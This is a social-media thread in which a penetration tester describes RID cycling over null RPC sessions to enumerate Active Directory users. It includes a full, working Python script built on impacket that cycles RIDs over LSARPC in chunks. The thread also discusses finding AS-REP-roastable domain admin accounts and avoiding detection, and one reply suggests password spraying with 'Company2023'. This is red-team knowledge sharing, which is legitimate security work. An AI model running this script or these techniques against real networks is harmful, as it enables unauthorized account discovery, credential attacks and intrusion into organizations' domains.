One thing I always look for when starting in a network without AD creds is user enumeration with RPC null sessions. The impacket SAMR (samrdump) and LSARPC (lookupsid) tools will give you only a small part of the story. Here's my minimal RID cycling script gist.github.com/naksyn/8204c76… that outplayed everything else, enabling me to find some crackable ASREP-roastable DA accounts hiding with RID > 50000 that could not be found using other tools. I am using chunks to avoid DoS and getting NT_STATUS_INSUFFICIENT_RESOURCES; ofc you can tweak it according to your YOLO level. There will be a new RPC connection for every chunk, which is a bit better than cycling with rpcclient every time and always starting RPC connections from scratch. However, RID cycling with rpcclient will generate a ton of STATUS_NO_SUCH_USER responses that are sus, if someone is looking and knows what to look for ofc.
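The chunked LSARPC lookup the tweet describes, written out as an added example. This is not naksyn's gist and not impacket's own lookupsid.py; it is a reimplementation of the same idea on top of impacket's lsat/lsad bindings. Assumptions: the target accepts a null session on \pipe\lsarpc, impacket is installed (imported lazily so the pure helpers run without it), the chunk size of 500 is an arbitrary starting point, and the SID used in the comments is a made-up domain SID. Each chunk gets a fresh RPC connection, STATUS_NONE_MAPPED / STATUS_SOME_NOT_MAPPED are treated as normal results, and STATUS_INSUFFICIENT_RESOURCES halves the chunk size and retries:

```python
#!/usr/bin/env python3
"""Chunked RID cycling over LSARPC (LsarLookupSids) with a null session.
Added example; not the gist from the tweet and not impacket's lookupsid.py."""
import sys
from typing import Dict, Iterator, List, Tuple

DEFAULT_CHUNK = 500  # assumption: arbitrary starting chunk size, tune to taste


def sid_chunks(domain_sid: str, start: int, stop: int, chunk: int) -> Iterator[List[str]]:
    """Yield lists of candidate SIDs (domain SID + RID), `chunk` RIDs per list.
    `stop` is exclusive, like range(). Pure function, no network."""
    if chunk < 1:
        raise ValueError("chunk must be >= 1")
    for lo in range(start, stop, chunk):
        yield ["%s-%d" % (domain_sid, rid) for rid in range(lo, min(lo + chunk, stop))]


def classify_status(msg: str) -> str:
    """Map the NTSTATUS text of a DCERPCException to an action:
    'empty'   -> STATUS_NONE_MAPPED: no RID in the chunk exists, move on
    'partial' -> STATUS_SOME_NOT_MAPPED: the exception carries a usable response
    'backoff' -> STATUS_INSUFFICIENT_RESOURCES: chunk too large, retry smaller
    'fatal'   -> anything else (access denied, network error, ...)"""
    if "STATUS_NONE_MAPPED" in msg:
        return "empty"
    if "STATUS_SOME_NOT_MAPPED" in msg:
        return "partial"
    if "STATUS_INSUFFICIENT_RESOURCES" in msg:
        return "backoff"
    return "fatal"


def _open_lsarpc(target: str):
    """New null-session connection to \\pipe\\lsarpc plus an opened policy handle."""
    from impacket.dcerpc.v5 import transport, lsat, lsad
    from impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
    rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\pipe\lsarpc]" % target)
    rpctransport.set_credentials("", "", "", "")  # null session: empty user/pass
    dce = rpctransport.get_dce_rpc()
    dce.connect()
    dce.bind(lsat.MSRPC_UUID_LSAT)
    policy = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)["PolicyHandle"]
    return dce, policy


def get_domain_sid(target: str) -> str:
    """Ask the target for its account-domain SID (e.g. S-1-5-21-...)."""
    from impacket.dcerpc.v5 import lsad
    dce, policy = _open_lsarpc(target)
    try:
        resp = lsad.hLsarQueryInformationPolicy2(
            dce, policy, lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)
        return resp["PolicyInformation"]["PolicyAccountDomainInfo"]["DomainSid"].formatCanonical()
    finally:
        dce.disconnect()


def lookup_chunk(target: str, sids: List[str]) -> Dict[str, Tuple[str, str, str]]:
    """Resolve one chunk of SIDs on a fresh connection.
    Returns {sid: (domain, name, sid_type)} for the SIDs that exist."""
    from impacket.dcerpc.v5 import lsat
    from impacket.dcerpc.v5.rpcrt import DCERPCException
    from impacket.dcerpc.v5.samr import SID_NAME_USE
    dce, policy = _open_lsarpc(target)
    try:
        try:
            resp = lsat.hLsarLookupSids(dce, policy, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)
        except DCERPCException as e:
            action = classify_status(str(e))
            if action == "empty":
                return {}
            if action == "partial":
                resp = e.get_packet()  # the response is still attached to the error
            else:
                raise  # 'backoff' and 'fatal' are handled by the caller
        found = {}
        domains = resp["ReferencedDomains"]["Domains"]
        # TranslatedNames come back in the same order as the SIDs we sent
        for sid, item in zip(sids, resp["TranslatedNames"]["Names"]):
            if item["Use"] == SID_NAME_USE.SidTypeUnknown:
                continue
            found[sid] = (domains[item["DomainIndex"]]["Name"], item["Name"],
                          SID_NAME_USE.enumItems(item["Use"]).name)
        return found
    finally:
        dce.disconnect()


def rid_cycle(target: str, domain_sid: str, start: int, stop: int,
              chunk: int = DEFAULT_CHUNK) -> Dict[str, Tuple[str, str, str]]:
    """Walk [start, stop) in chunks, halving the chunk size on INSUFFICIENT_RESOURCES."""
    from impacket.dcerpc.v5.rpcrt import DCERPCException
    found: Dict[str, Tuple[str, str, str]] = {}
    lo = start
    while lo < stop:
        sids = next(sid_chunks(domain_sid, lo, stop, chunk))
        try:
            found.update(lookup_chunk(target, sids))
            lo += len(sids)
        except DCERPCException as e:
            if classify_status(str(e)) == "backoff" and chunk > 1:
                chunk //= 2  # retry the same range with a smaller chunk
                continue
            raise
    return found


if __name__ == "__main__":
    host = sys.argv[1]
    dom_sid = get_domain_sid(host)
    # RIDs above 50000 are where the tweet found the interesting accounts
    for sid, (dom, name, kind) in sorted(rid_cycle(host, dom_sid, 500, 60000).items(),
                                         key=lambda kv: int(kv[0].rsplit("-", 1)[1])):
        print("%s\t%s\\%s\t%s" % (sid.rsplit("-", 1)[1], dom, name, kind))
```

The lookup level LsapLookupWksta is what impacket's own tooling uses for this call; a smaller chunk produces more, smaller LSARPC requests, a larger one risks the NT_STATUS_INSUFFICIENT_RESOURCES response the tweet mentions, which the loop above recovers from by halving and retrying rather than aborting.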
@naksyn @mubix I like to use nullinux for this use case: github.com/m8sec/nullinux
@naksyn how does this work better over `nxc smb -u '' -p '' --rid-brute`?
@naksyn This kind of user enumeration does not trigger MDI or ATA detection?
@naksyn The better duo: user enum with null session + pwd spraying "Company2023"